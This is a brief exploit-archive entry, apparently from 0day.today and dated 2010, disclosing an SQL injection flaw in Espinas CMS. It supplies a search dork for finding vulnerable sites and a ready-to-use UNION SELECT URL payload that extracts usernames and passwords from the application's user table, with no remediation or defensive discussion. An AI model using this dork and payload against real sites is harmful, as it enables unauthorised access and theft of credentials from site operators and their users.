id: 11663
date: 04/07/2010
title: Espinas CMS SQL Injection Vulnerability
author: Pouya Daneshmand
cves: 

=======================================
Espinas CMS SQL Injection Vulnerability
=======================================

#################################################################
# Application Info:
# Name: Espinas CMS
# Vendor: http://espinas.ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
# Dork: "Powered by Espinas IT"
#################################################################
Vulnerability:
http://site.ir/news.asp?id=-1+union+select+1,concat(username,0x3a,0x3a,password),3,4,5+from+sinabed_users
--------------------------------------------------------------
 
#################################################################



#  0day.today [2023-03-27]  #